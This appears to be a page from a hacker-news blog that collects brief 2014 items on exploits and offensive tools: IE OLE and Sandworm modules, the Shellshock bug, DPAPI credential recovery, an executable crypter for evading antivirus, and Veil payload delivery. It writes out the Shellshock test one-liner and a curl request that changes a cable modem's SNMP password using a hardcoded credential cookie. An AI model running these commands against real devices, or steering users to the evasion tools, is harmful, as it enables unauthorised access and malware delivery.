illmob

Quick and dirty Metasploit module based off of @yuange ‘s code from 2009. This vulnerability affects Windows 95 IE 3.0 until Windows 10 IE 11. https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/ Module here: ms14_064_ie_olerce.rb

This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as “Sandworm”. Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
http://www.exploit-db.com/exploits/35236/

Using a remote stack overflow in libupnp Fred was able to take control of his TV using the serial port in the back of the TV http://www.fredericb.info/2014/11/exploitation-of-philips-smart-tv.html

DPAPIck is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API). The tool was updated to support Windows versions all the way to 8.1.

list of recoverable secrets are :

• EFS certificates
• MSN Messenger credentials
• Internet Explorer form passwords
• Outlook passwords
• Google Talk credentials
• Google Chrome form passwords
• Wireless network keys (WEP key and WPA-PMK)
• Skype credentials

Src: dpapick.com

A remotely exploitable vulnerability has been discovered in bash on Linux. The vulnerability affects Debian as well as other Linux distros, patch ASAP.

$ env x='() { :;}; echo vulnerable’ bash -c “echo test”

more info: securityblog.redhat.com

curl -isk -X ‘GET’ -b ‘credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9’ ‘http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;’

src: console-cowboys.blogspot.com

http://rcrypt.0xrage.com/
Upload your executable file to encrypt and pack it. So far supports rcrypt,fsg,upx,mew,upolyx,petite, & afx pecrypt.

Quickly find and explore shares our current user has access to: https://www.veil-framework.com/hunting-sensitive-data-veil-framework/

Kali’s new image is a EFI Bootable ISO Hybrid image that supports Live USB Encrypted Persistence with LUKS Nuke support, out of the box. More Info @ http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/

Veil Framework recently added a payload delivery tool Veil-Catapult. Works like SMBexec with utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using temporary SMB server. :::Read more here::: & :::here:::